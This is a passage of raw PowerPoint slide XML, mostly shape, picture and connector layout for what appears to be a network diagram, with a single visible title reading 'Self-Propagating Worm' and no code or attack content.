              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597FCBB6-1177-9152-C122-986BCD6CFB54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527417" y="3340353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9" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0532337B-6297-B051-D7AD-380D0D2019EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475859" y="610870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4" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{610630CD-6DC1-AE4A-475F-1F5395DD5CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="100584" y="265175"/>
            <a:ext cx="8961120" cy="6026150"/>
            <a:chOff x="100584" y="265175"/>
            <a:chExt cx="8961120" cy="6026150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D72B938-BCE7-C755-1D69-F3DA1EB91B2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5800" y="265175"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27192789-816F-2368-56E5-4B76A88C974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4548" y="4829555"/>
              <a:ext cx="757427" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6CE891-1002-47F4-0FAE-91854F2FCC1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" y="1371600"/>
              <a:ext cx="755904" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88199552-80E1-1668-7AD0-DC00A901145C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1365503" y="1752600"/>
              <a:ext cx="2000885" cy="1243330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2000885" h="1243330">
                  <a:moveTo>
                    <a:pt x="2000631" y="124294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23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B61A42A-6581-DF21-4DB9-400A21175D8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2572511"/>
              <a:ext cx="755904" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FF3702-B252-A2F3-1CC1-709A9E2A26D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1216151" y="2953511"/>
              <a:ext cx="2151380" cy="41910"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2151379" h="41910">
                  <a:moveTo>
                    <a:pt x="2150999" y="416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25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD3F6F5-8F98-5C59-2031-227815F056A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" y="3948684"/>
              <a:ext cx="755904" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F753FE-1E3D-02D7-2585-5C1C6C2AFDFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360931" y="2996183"/>
              <a:ext cx="2005964" cy="1045210"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2005964" h="1045210">
                  <a:moveTo>
                    <a:pt x="2005457" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="104508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27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE010F42-BA84-FF88-8E47-CA601271926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84" y="5533643"/>
              <a:ext cx="755904" cy="757428"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C35CA8-B754-39B2-4D27-07076CE4DD6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="551688" y="4698491"/>
              <a:ext cx="436245" cy="819150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="436244" h="819150">
                  <a:moveTo>
                    <a:pt x="0" y="819022"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436118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29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0897C55-5401-B375-4D9D-11CC6A17445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3851" y="5516879"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2337FE12-76AB-5ED1-860D-E017A44D8D45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1388364" y="643127"/>
              <a:ext cx="7145655" cy="4942840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="592074" y="4942332"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3983736"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="4008628" y="2895600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3375660" y="4185030"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="6916928" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4882896" y="607187"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="7145274" y="347472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6675119" y="1959483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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE8FC36-C008-C4C8-32D6-700DA4AB0AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557276" y="2108962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8" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393D19EB-4447-7C43-4570-5CF9814E44D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373481" y="3327272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9" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8EE7676-9FF3-E916-F62A-94D9E631545A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526794" y="4213352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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A3609F-7DC9-9AC8-1869-B34A60C3D6F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262373" y="5602630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1" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D0B20D-5902-4991-845C-C214E0BAC0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8233409" y="47624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579400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F7A84325-3C15-2683-4D2A-BBE686C164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3724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Self-Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E7EE46-1D0E-B30D-BF53-77BBE86A9CD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1723" y="2362200"/>
            <a:ext cx="998220" cy="1266444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FB648DAD-E889-5649-6E37-B811F053056D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5603240" y="3609213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my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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6795DC20-FD65-98F1-85D3-A206F88A58B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3366515" y="882396"/>
            <a:ext cx="5076825" cy="4430395"/>
            <a:chOff x="3366515" y="882396"/>
            <a:chExt cx="5076825" cy="4430395"/>
          </a:xfrm>
        </p:grpSpPr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774D2F44-41A8-BEC6-F5F9-1F330A86270B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4123943" y="2983738"/>
              <a:ext cx="1292860" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1292860">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1292669" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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6E7E07E3-D739-970F-CA5A-15C9C96BA719}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5920739" y="1638300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9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9B20F54B-46AA-0758-6BDA-DDF76C819013}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6396037" y="2983738"/>
              <a:ext cx="1289685" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1289684">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1289494" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="33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C60836C4-CDBA-E572-0F76-0FEB00E60FE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6397751" y="3610356"/>
              <a:ext cx="608965" cy="1088390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="608965" h="1088389">
                  <a:moveTo>
                    <a:pt x="608838" y="108800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10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA55728C-F8A9-A88D-DBB3-097551FBCF6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6515" y="2616708"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="object 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC05E72-DC1E-2222-BEAD-68055DBD580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2787" y="882396"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B7D072-BB0C-3058-8F46-8C40C972C12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5531" y="2593847"/>
              <a:ext cx="757427" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A4AA669-E17B-6912-A8C8-33BA7467D84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1800" y="4556760"/>
              <a:ext cx="755903" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4618C92-D4F9-578D-5FCA-8B716C47AC21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3279394" y="3358133"/>
            <a:ext cx="10655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8" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45BA3E8-576B-9D12-54BC-919E4CB2FFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709029" y="5285359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9" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD5677BD-7A32-29AF-BEE3-D36D16E446DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527417" y="3340353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0" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41DFD9F7-C3D8-EDCC-95AD-2A1A8CA2C886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475859" y="610870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1" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97EB51EA-9FBE-67CB-AAAE-C883CD3F3023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="100584" y="265175"/>
            <a:ext cx="8961120" cy="6026150"/>
            <a:chOff x="100584" y="265175"/>
            <a:chExt cx="8961120" cy="6026150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB5286A-6737-953D-B38A-BF06DB534D9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5800" y="265175"/>
              <a:ext cx="755903" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71692156-318D-2DD5-A53C-42CEF35612D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4548" y="4829555"/>
              <a:ext cx="757427" cy="755904"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC87157-4788-CFC9-5BB5-7287C5E5DFF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" y="1371600"/>
              <a:ext cx="755904" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7819D36-4AB5-A3D7-9D59-0EA7D5B21A69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1365503" y="1752600"/>
              <a:ext cx="2000885" cy="1243330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2000885" h="1243330">
                  <a:moveTo>
                    <a:pt x="2000631" y="124294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23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45ED3E96-B230-DBC9-237D-6FD573E0FFA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2572511"/>
              <a:ext cx="755904" cy="755903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DDEF142-2750-E473-9FCA-FD3EAEE664B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1216151" y="2953511"/>
              <a:ext cx="2151380" cy="41910"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2151379" h="41910">
                  <a:moveTo>
                    <a:pt x="2150999" y="416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25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D098EB00-15F4-2455-B13E-F9A56DAD65D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" y="3948684"/>
              <a:ext cx="755904" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A1E836C-20E2-EBAA-AC9B-88DBFE68DC84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360931" y="2996183"/>
              <a:ext cx="2005964" cy="1045210"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2005964" h="1045210">
                  <a:moveTo>
                    <a:pt x="2005457" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="104508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27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6437FC4C-83CD-384D-7160-66CDE3AF874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84" y="5533643"/>
              <a:ext cx="755904" cy="757428"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29333D28-6F80-6FDE-A9CE-9757431271D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="551688" y="4698491"/>
              <a:ext cx="436245" cy="819150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="436244" h="819150">
                  <a:moveTo>
                    <a:pt x="0" y="819022"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436118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29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C53F8A8-1B0F-0CBD-3AFE-1A4EF8A8702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3851" y="5516879"/>
              <a:ext cx="757427" cy="757427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="object 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90BDAF0-44FD-D754-9977-50E485304CA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1388364" y="643127"/>
              <a:ext cx="7145655" cy="4942840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="592074" y="4942332"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="3983736"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="4008628" y="2895600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3375660" y="4185030"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="6916928" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4882896" y="607187"/>
                  </a:lnTo>
                </a:path>
                <a:path w="7145655" h="4942840">
                  <a:moveTo>
                    <a:pt x="7145274" y="347472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6675119" y="1959483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31">
